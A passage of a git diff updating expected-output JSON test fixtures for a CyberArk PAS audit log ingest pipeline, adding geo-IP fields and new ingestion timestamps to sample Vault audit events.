Driver};server=127.0.0.1;user=root;option=3;port=3306;Password=1234\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615831206\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"Port\",\"Value\":\"3306\"},{\"Name\":\"Database\",\"Value\":\"test\"},{\"Name\":\"DSN\",\"Value\":\"mysql\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "38", "kind": "event", @@ -1444,10 +1489,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "ELASTIC.local\\bart" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { @@ -1531,7 +1585,7 @@ "event": { "severity": 7, "reason": "Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). ", - "ingested": "2021-12-09T13:37:01.193671600Z", + "ingested": "2021-12-14T14:42:29.505129066Z", "original": "\u003c7\u003e1 2021-03-15T18:05:16Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 11:05:16\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T18:05:16Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=3;username=ELASTIC.local\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC.local\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"3\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615831516\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 11:05:16\",\"IsoTimestamp\":\"2021-03-15T18:05:16Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=3;username=ELASTIC.local\\\\bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC.local\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"3\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615831516\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "38", "kind": "event", @@ -1555,10 +1609,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "ELASTIC.local\\bart" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { @@ -1642,7 +1705,7 @@ "event": { "severity": 7, "reason": "Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). ", - "ingested": "2021-12-09T13:37:01.193677300Z", + "ingested": "2021-12-14T14:42:29.505129467Z", "original": "\u003c7\u003e1 2021-03-16T09:50:19Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 16 02:50:19\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-16T09:50:19Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=4;username=ELASTIC.local\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC.local\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"4\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615888216\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 16 02:50:19\",\"IsoTimestamp\":\"2021-03-16T09:50:19Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=4;username=ELASTIC.local\\\\bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC.local\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"4\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615888216\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "38", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-385-blservice-audit-record.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-385-blservice-audit-record.log-expected.json index 3fecfee889a..92d9ca5895a 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-385-blservice-audit-record.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-385-blservice-audit-record.log-expected.json @@ -58,7 +58,7 @@ "event": { "severity": 2, "action": "blservice audit record", - "ingested": "2021-12-09T13:37:03.416577Z", + "ingested": "2021-12-14T14:42:31.833281936Z", "original": "\u003c5\u003e1 2021-03-11T16:31:13Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:31:13\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:31:13Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e385\u003c/MessageID\u003e\\n \u003cDesc\u003eBLService Audit Record\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eBLService Audit Record\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: False; EnforceExpirationPeriod: 90; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 90; PSMEnabled: True; RequireReason: AllowFreeTextReason: True, BasicValue: True; AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eBLService Audit Record\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:31:13\",\"IsoTimestamp\":\"2021-03-11T16:31:13Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"385\",\"Desc\":\"BLService Audit Record\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"BLService Audit Record\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: False; EnforceExpirationPeriod: 90; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 90; PSMEnabled: True; RequireReason: AllowFreeTextReason: True, BasicValue: True; AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"BLService Audit Record\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "385", "kind": "event" @@ -122,7 +122,7 @@ "event": { "severity": 2, "action": "blservice audit record", - "ingested": "2021-12-09T13:37:03.416585700Z", + "ingested": "2021-12-14T14:42:31.833284435Z", "original": "\u003c5\u003e1 2021-03-11T16:31:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:31:23\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:31:23Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e385\u003c/MessageID\u003e\\n \u003cDesc\u003eBLService Audit Record\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eBLService Audit Record\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: True; EnforceExpirationPeriod: 90; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 90; PSMEnabled: True; RequireReason: AllowFreeTextReason: True, BasicValue: True; AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eBLService Audit Record\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:31:23\",\"IsoTimestamp\":\"2021-03-11T16:31:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"385\",\"Desc\":\"BLService Audit Record\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"BLService Audit Record\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: True; EnforceExpirationPeriod: 90; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 90; PSMEnabled: True; RequireReason: AllowFreeTextReason: True, BasicValue: True; AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"BLService Audit Record\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "385", "kind": "event" @@ -186,7 +186,7 @@ "event": { "severity": 2, "action": "blservice audit record", - "ingested": "2021-12-09T13:37:03.416591300Z", + "ingested": "2021-12-14T14:42:31.833284996Z", "original": "\u003c5\u003e1 2021-03-11T19:40:52Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 11:40:52\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T19:40:52Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e385\u003c/MessageID\u003e\\n \u003cDesc\u003eBLService Audit Record\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eBLService Audit Record\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: True; EnforceExpirationPeriod: 90; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 90; PSMEnabled: False; RequireReason: AllowFreeTextReason: True, BasicValue: True; AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eBLService Audit Record\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 11:40:52\",\"IsoTimestamp\":\"2021-03-11T19:40:52Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"385\",\"Desc\":\"BLService Audit 